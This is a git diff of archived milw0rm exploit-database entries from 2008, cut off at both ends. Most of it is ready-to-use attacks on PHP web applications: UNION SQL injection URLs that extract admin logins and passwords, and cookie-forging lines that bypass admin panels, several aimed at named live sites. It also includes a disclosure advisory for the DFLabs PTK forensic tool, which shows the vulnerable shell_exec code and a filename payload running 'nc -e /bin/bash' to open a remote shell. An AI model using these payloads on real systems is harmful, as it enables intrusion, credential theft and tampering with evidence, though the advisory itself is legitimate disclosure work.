+[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
+[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
+
+
+===[ LIVE ]===
+[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
+[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6998.txt b/platforms/php/webapps/6998.txt
index 9bd67a08b..c5d8fc654 100755
--- a/platforms/php/webapps/6998.txt
+++ b/platforms/php/webapps/6998.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PRE SHOPPING MALL Insecure Cookie Handling
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: PRE SHOPPING MALL
-[~] Language : PHP
-[~] Website[main]: http://www.preproject.com
-[~] Website[script]: http://www.preproject.com/emall.asp
-[~] Type : Commercial
-[~] Report-Date : 05/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-Admin Panel: http://localhost/[path]/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ LIVE ]===
-Admin Panel: http://preproject.com/emall/admin/loginform.php
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PRE SHOPPING MALL Insecure Cookie Handling
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: PRE SHOPPING MALL
+[~] Language : PHP
+[~] Website[main]: http://www.preproject.com
+[~] Website[script]: http://www.preproject.com/emall.asp
+[~] Type : Commercial
+[~] Report-Date : 05/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+Admin Panel: http://localhost/[path]/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ LIVE ]===
+Admin Panel: http://preproject.com/emall/admin/loginform.php
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/6999.txt b/platforms/php/webapps/6999.txt
index 367bcbb10..30e04f4aa 100755
--- a/platforms/php/webapps/6999.txt
+++ b/platforms/php/webapps/6999.txt
@@ -1,55 +1,55 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
-[~] Language : PHP
-[~] Website[main]: http://www.preproject.com
-[~] Website[script]: http://www.preproject.com/mcart.asp
-[~] Type : Commercial
-[~] Report-Date : 05/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-admin-panel: http://localhost/[path]/SiteAdmin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-===[ LIVE ]===
-admin-panel: http://preproject.com/prebay/siteadmin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ SQL ]===
-[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
-[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
-[!] 
http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
-
-
-
-===[ SQL-LIVE ]===
-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
+[~] Language : PHP
+[~] Website[main]: http://www.preproject.com
+[~] Website[script]: http://www.preproject.com/mcart.asp
+[~] Type : Commercial
+[~] Report-Date : 05/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+admin-panel: http://localhost/[path]/SiteAdmin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+===[ LIVE ]===
+admin-panel: http://preproject.com/prebay/siteadmin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ SQL ]===
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
+
+
+
+===[ SQL-LIVE ]===
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7000.txt b/platforms/php/webapps/7000.txt
index 22a190069..036cda184 100755
--- a/platforms/php/webapps/7000.txt
+++ b/platforms/php/webapps/7000.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre Classified Listings PHP Insecure Cookie Handling
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: Pre Classified Listings PHP version
-[~] Language : PHP
-[~] Website[main]: http://www.preproject.com
-[~] Website[script]: http://www.preproject.com/pclphp.asp
-[~] Type : Commercial
-[~] Report-Date : 05/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-Admin Panel: http://localhost/[path]/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ LIVE ]===
-Admin Panel: http://www.hostnomi.net/classi/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre Classified Listings PHP Insecure Cookie Handling
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: Pre Classified Listings PHP version
+[~] Language : PHP
+[~] Website[main]: http://www.preproject.com
+[~] Website[script]: http://www.preproject.com/pclphp.asp
+[~] Type : Commercial
+[~] Report-Date : 05/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+Admin Panel: http://localhost/[path]/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ LIVE ]===
+Admin Panel: http://www.hostnomi.net/classi/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7001.txt b/platforms/php/webapps/7001.txt
index 72072f18d..33b163bf4 100755
--- a/platforms/php/webapps/7001.txt
+++ b/platforms/php/webapps/7001.txt
@@ -1,240 +1,240 @@ -==================================================== -Security Research Advisory - -Vulnerability name: DFLabs PTK Local Command Execution Vulnerability -Advisory number: LC-2008-07 -Advisory URL: http://www.ikkisoft.com - -==================================================== -1) Affected Software - -* DFLabs PTK 1.0 (final release) - -Previous versions are affected as well: - -* DFLabs PTK 0.2 -* DFLabs PTK 0.1 - -==================================================== -2) Severity - -Severity: High -Local/Remote: Local - -Note: remote command execution is possible and moreover -easy to trigger; however, due to the nature of the tool, only -the local command execution poses a serious real world threat - -==================================================== -3) Summary - -As reported in the project website, "PTK is an alternative advanced interface -for the suite TSK (The Sleuth Kit). [...] PTK is not just a new graphic and -highly professional interface based on Ajax technology but offers a great deal -of features like analysis, search and management of complex cases of digital -investigation". PTK is included within the SANS Investigative Forensic Toolkit -(SIFT) Workstation. - -This application is vulnerable to multiple input validation attacks. The -possibility to exploit these findings introduces several malicious scenarios. -For instance, a criminal may abuse this specific vulnerability to modify -the evidence of the crime, compromising the digital investigation workstation. -Even if the original evidence should be accessed only in read-only mode, -using also hardware write blockers according to forensic best practices, -several malicious scenarios are possible with just the alteration of the -working copy image. Additionally, a payload could be crafted to hide, -or alter, just the information presented to the analyst, something which -would not be evident unless the same image is analyzed with a tool not -vulnerable to the attack. 
- -In our research, we have developed a reliable Proof-of-Concept in order -to exploit an arbitrary local command execution vulnerability showing possible -anti forensic attacks. As defined by Rogers D. M. (2005), anti forensics -attempts to "negatively affect the existence, amount and/or quality of -evidence from a crime scene, or make the analysis and examination of evidence -difficult or impossible to conduct". - -References: -http://ptk.dflabs.com/ -http://en.wikipedia.org/wiki/Counter_forensics - -==================================================== -4) Vulnerability Details - -The PTK interface is prone to multiple input validation vulnerabilities that may -result in a silent local command execution. - -Since the application fails to validate most of the input vectors, Cross Site -Scripting, CSRF and other flaws are possible. However, due to the nature of the -tool, our research aimed to point out the possible risks and attack techniques -which could be used in order to silently compromise the investigation platform -and corrupt evidence without user interaction. -Even if the application is vulnerable to remote command execution, as a real life -threat it is pretty unrealistic. PTK, as well as Autopsy, are usually used in the -"localhost" context where a single user (the investigator) analyzes the crime image. - -However, in our humble opinion, a local command execution vulnerability triggered -by the simple inclusion of the acquired crime scene image should be considered -as an HIGH impact flaw with an HIGH exploitability rate. - -Once the investigator has loaded the binary image (e.g. a "dd" file), he can -browse the filesystem tree and look for a specific file. During the browsing, -the Ajax-based application uses binaries of the Sleuth Kit in order to access -the acquired image content. In the browsing, the "fls" application is involved. 
-As illustrated in the man, it lists the files and directory names in the image -and can display file names of recently deleted files for the directory using the -given inode. - -Once the investigator selects a specific file from the image filesystem, PTK -invokes the following script: - -/ptk/lib/file_content.php?arg1=null&arg2=107533&arg3=&arg4=1 - -where is the filename without any kind of input validation retrieved -from the image via fls. -A malicious user (e.g. a person under investigation) may abuse this attack input -simply creating a crafted file in his/her filesystem, as demonstrated below. - -Due to the possibility to pollute the "arg3" variable, we can also override the -"arg1" HTTP parameter with the following content: - -arg3 --> Confidential.doc&arg1=[new arg1 variable value] - -This request is managed by PTK using the following code: - -[..] -$offset = $_GET['arg1']; -$inode = $_GET['arg2']; -$name = $_GET['arg3']; -$partition_id = $_GET['arg4']; -$page_offset = 100; -[..] -$type = get_file_type($_SESSION['image_path'], $offset, $inode); -[..] - -where the function "get_file_type" is: - -function get_file_type($path, $offset, $inode){ - include("../config/conf.php"); - if($offset == 'null'){ - $offset = ''; - }else{ - $offset = "-o $offset"; - } - if($inode == 'null') $inode = ''; - $result = shell_exec("$icat_bin -r $offset $path $inode | $file_bin -zb -"); - if(preg_match("/(image data)|(PC bitmap data)/", $result)){ - $_SESSION['is_graphic'] = 1; - } - return $result; -} - -As you can see, the $offset variable used within the unfiltered shell_exec -function could be used in order to execute arbitrary system commands -with the privileges of the web server. - -Since the malicious payload should be included in the filename, some obfuscation -techniques are pretty interesting in order to force PTK to not reveal the real filename. 
-Several possibilities were tested, including the usage of UTF-7 encoding since PTK -does not force a specific page charset. However the most reliable and easy to use -technique is the inclusion of fake HTML tags: - -Confidential.doc - -It should be noted that the simple injection of HTML tag chars ("<", "&", ">", ..) -is not possible due to HTML filtering which results in the corresponding HTML entities. - -Lastly, we want to inform the PTK team that other functions are probably vulnerable -to similar attacks. Several instances of the "shell_exec" PHP function are present -in the "/lib" files and they are used with unfiltered parameters: - -/lib/check_image_integrity.php -/lib/folder_browsing.php -/lib/lib_command.php -/lib/new_image.php - -$ grep -R "shell_exec(" ./lib/ | wc -l -73 - -Since PTK needs to execute system commands in order to invoke the Sleuth Kit -binaries, no standard mitigations are applicable (e.g. disable_functions, -safe_mode and others). - -==================================================== -5) Exploit - -The attacker can use this crafted filename in order to silently trigger the -arbitrary command execution and open a remote shell: - -Confidential.doc - -From the application point of view, it results in the following commands: - -"/usr/local/bin/icat -r -o a;nc -e /bin/bash 192.168.1.3 12345;> /var/www/ptk/ -images/myCase_myCrime.001 1936 | /usr/bin/file -zb -" - -In addition to the remote shell, this payload compromises the crime evidence -because the char ">" acts as an output redirection in the shell, resulting in -the acquired image overriding. If the image was added using the option "symlink", -the working-copy crime image is fatally compromised. Obviously, according to the -forensic best practices, the original image should be accessed in read-only mode -and carefully stored. - -A demonstration video of the attack is provided as well. 
-- http://www.vimeo.com/2161045 (High quality streaming) -- http://uk.youtube.com/watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming) -- http://www.ikkisoft.com/stuff/ptk_exploit_poc.avi - - -According to the PTK Practice Cases (http://ptk.dflabs.com/tutorial.html), -a standard Linux Ubuntu with Apache, MySQL and PHP5 was used during our test. - -==================================================== -6) Fix Information - -A software update is required in order to resolve this issue. -The PTK team has released a new version (ptk-1.0.1.tar.gz, 04/11/2008), -available on the project website. - -Upgrade your PTK as soon as possible! - -The new version deploys OWASP PHP filters to avoid unexpected input used -within Sleuth Kit binaries. - -In order to clarify their position about security bug reports, the team has -published the following comment: http://ptk.dflabs.com/faq.html - -==================================================== -7) Time Table - -30/10/2008 - Vendor notified. -30/10/2008 - Vendor response. -04/11/2008 - Vendor patch release. -05/11/2008 - Public disclosure. - -==================================================== -8) Credits - -Discovered by Luca "ikki" Carettoni - luca.carettoni[at]ikkisoft[dot]com - -==================================================== -9) Legal Notices - -The information in the advisory is believed to be accurate at the time of -publishing based on currently available information. -This information is provided as-is, as a free service to the community. -There are no warranties with regard to this information. -The author does not accept any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, this information. -Permission is hereby granted for the redistribution of this alert, provided -that the content is not altered in any way, except reformatting, and that due -credit is given. 
- -This vulnerability has been disclosed in accordance with -the RFP Full-Disclosure Policy v2.0, available at: -http://www.wiretrip.net/rfp/policy.html - -==================================================== - -# milw0rm.com [2008-11-05] +==================================================== +Security Research Advisory + +Vulnerability name: DFLabs PTK Local Command Execution Vulnerability +Advisory number: LC-2008-07 +Advisory URL: http://www.ikkisoft.com + +==================================================== +1) Affected Software + +* DFLabs PTK 1.0 (final release) + +Previous versions are affected as well: + +* DFLabs PTK 0.2 +* DFLabs PTK 0.1 + +==================================================== +2) Severity + +Severity: High +Local/Remote: Local + +Note: remote command execution is possible and moreover +easy to trigger; however, due to the nature of the tool, only +the local command execution poses a serious real world threat + +==================================================== +3) Summary + +As reported in the project website, "PTK is an alternative advanced interface +for the suite TSK (The Sleuth Kit). [...] PTK is not just a new graphic and +highly professional interface based on Ajax technology but offers a great deal +of features like analysis, search and management of complex cases of digital +investigation". PTK is included within the SANS Investigative Forensic Toolkit +(SIFT) Workstation. + +This application is vulnerable to multiple input validation attacks. The +possibility to exploit these findings introduces several malicious scenarios. +For instance, a criminal may abuse this specific vulnerability to modify +the evidence of the crime, compromising the digital investigation workstation. +Even if the original evidence should be accessed only in read-only mode, +using also hardware write blockers according to forensic best practices, +several malicious scenarios are possible with just the alteration of the +working copy image. 
Additionally, a payload could be crafted to hide, +or alter, just the information presented to the analyst, something which +would not be evident unless the same image is analyzed with a tool not +vulnerable to the attack. + +In our research, we have developed a reliable Proof-of-Concept in order +to exploit an arbitrary local command execution vulnerability showing possible +anti forensic attacks. As defined by Rogers D. M. (2005), anti forensics +attempts to "negatively affect the existence, amount and/or quality of +evidence from a crime scene, or make the analysis and examination of evidence +difficult or impossible to conduct". + +References: +http://ptk.dflabs.com/ +http://en.wikipedia.org/wiki/Counter_forensics + +==================================================== +4) Vulnerability Details + +The PTK interface is prone to multiple input validation vulnerabilities that may +result in a silent local command execution. + +Since the application fails to validate most of the input vectors, Cross Site +Scripting, CSRF and other flaws are possible. However, due to the nature of the +tool, our research aimed to point out the possible risks and attack techniques +which could be used in order to silently compromise the investigation platform +and corrupt evidence without user interaction. +Even if the application is vulnerable to remote command execution, as a real life +threat it is pretty unrealistic. PTK, as well as Autopsy, are usually used in the +"localhost" context where a single user (the investigator) analyzes the crime image. + +However, in our humble opinion, a local command execution vulnerability triggered +by the simple inclusion of the acquired crime scene image should be considered +as an HIGH impact flaw with an HIGH exploitability rate. + +Once the investigator has loaded the binary image (e.g. a "dd" file), he can +browse the filesystem tree and look for a specific file. 
During the browsing, +the Ajax-based application uses binaries of the Sleuth Kit in order to access +the acquired image content. In the browsing, the "fls" application is involved. +As illustrated in the man, it lists the files and directory names in the image +and can display file names of recently deleted files for the directory using the +given inode. + +Once the investigator selects a specific file from the image filesystem, PTK +invokes the following script: + +/ptk/lib/file_content.php?arg1=null&arg2=107533&arg3=&arg4=1 + +where is the filename without any kind of input validation retrieved +from the image via fls. +A malicious user (e.g. a person under investigation) may abuse this attack input +simply creating a crafted file in his/her filesystem, as demonstrated below. + +Due to the possibility to pollute the "arg3" variable, we can also override the +"arg1" HTTP parameter with the following content: + +arg3 --> Confidential.doc&arg1=[new arg1 variable value] + +This request is managed by PTK using the following code: + +[..] +$offset = $_GET['arg1']; +$inode = $_GET['arg2']; +$name = $_GET['arg3']; +$partition_id = $_GET['arg4']; +$page_offset = 100; +[..] +$type = get_file_type($_SESSION['image_path'], $offset, $inode); +[..] + +where the function "get_file_type" is: + +function get_file_type($path, $offset, $inode){ + include("../config/conf.php"); + if($offset == 'null'){ + $offset = ''; + }else{ + $offset = "-o $offset"; + } + if($inode == 'null') $inode = ''; + $result = shell_exec("$icat_bin -r $offset $path $inode | $file_bin -zb -"); + if(preg_match("/(image data)|(PC bitmap data)/", $result)){ + $_SESSION['is_graphic'] = 1; + } + return $result; +} + +As you can see, the $offset variable used within the unfiltered shell_exec +function could be used in order to execute arbitrary system commands +with the privileges of the web server. 
+ +Since the malicious payload should be included in the filename, some obfuscation +techniques are pretty interesting in order to force PTK to not reveal the real filename. +Several possibilities were tested, including the usage of UTF-7 encoding since PTK +does not force a specific page charset. However the most reliable and easy to use +technique is the inclusion of fake HTML tags: + +Confidential.doc + +It should be noted that the simple injection of HTML tag chars ("<", "&", ">", ..) +is not possible due to HTML filtering which results in the corresponding HTML entities. + +Lastly, we want to inform the PTK team that other functions are probably vulnerable +to similar attacks. Several instances of the "shell_exec" PHP function are present +in the "/lib" files and they are used with unfiltered parameters: + +/lib/check_image_integrity.php +/lib/folder_browsing.php +/lib/lib_command.php +/lib/new_image.php + +$ grep -R "shell_exec(" ./lib/ | wc -l +73 + +Since PTK needs to execute system commands in order to invoke the Sleuth Kit +binaries, no standard mitigations are applicable (e.g. disable_functions, +safe_mode and others). + +==================================================== +5) Exploit + +The attacker can use this crafted filename in order to silently trigger the +arbitrary command execution and open a remote shell: + +Confidential.doc + +From the application point of view, it results in the following commands: + +"/usr/local/bin/icat -r -o a;nc -e /bin/bash 192.168.1.3 12345;> /var/www/ptk/ +images/myCase_myCrime.001 1936 | /usr/bin/file -zb -" + +In addition to the remote shell, this payload compromises the crime evidence +because the char ">" acts as an output redirection in the shell, resulting in +the acquired image overriding. If the image was added using the option "symlink", +the working-copy crime image is fatally compromised. 
Obviously, according to the +forensic best practices, the original image should be accessed in read-only mode +and carefully stored. + +A demonstration video of the attack is provided as well. +- http://www.vimeo.com/2161045 (High quality streaming) +- http://uk.youtube.com/watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming) +- http://www.ikkisoft.com/stuff/ptk_exploit_poc.avi + + +According to the PTK Practice Cases (http://ptk.dflabs.com/tutorial.html), +a standard Linux Ubuntu with Apache, MySQL and PHP5 was used during our test. + +==================================================== +6) Fix Information + +A software update is required in order to resolve this issue. +The PTK team has released a new version (ptk-1.0.1.tar.gz, 04/11/2008), +available on the project website. + +Upgrade your PTK as soon as possible! + +The new version deploys OWASP PHP filters to avoid unexpected input used +within Sleuth Kit binaries. + +In order to clarify their position about security bug reports, the team has +published the following comment: http://ptk.dflabs.com/faq.html + +==================================================== +7) Time Table + +30/10/2008 - Vendor notified. +30/10/2008 - Vendor response. +04/11/2008 - Vendor patch release. +05/11/2008 - Public disclosure. + +==================================================== +8) Credits + +Discovered by Luca "ikki" Carettoni - luca.carettoni[at]ikkisoft[dot]com + +==================================================== +9) Legal Notices + +The information in the advisory is believed to be accurate at the time of +publishing based on currently available information. +This information is provided as-is, as a free service to the community. +There are no warranties with regard to this information. +The author does not accept any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, this information. 
+Permission is hereby granted for the redistribution of this alert, provided
+that the content is not altered in any way, except reformatting, and that due
+credit is given.
+
+This vulnerability has been disclosed in accordance with
+the RFP Full-Disclosure Policy v2.0, available at:
+http://www.wiretrip.net/rfp/policy.html
+
+====================================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7002.txt b/platforms/php/webapps/7002.txt
index 9918afd60..d97b4a959 100755
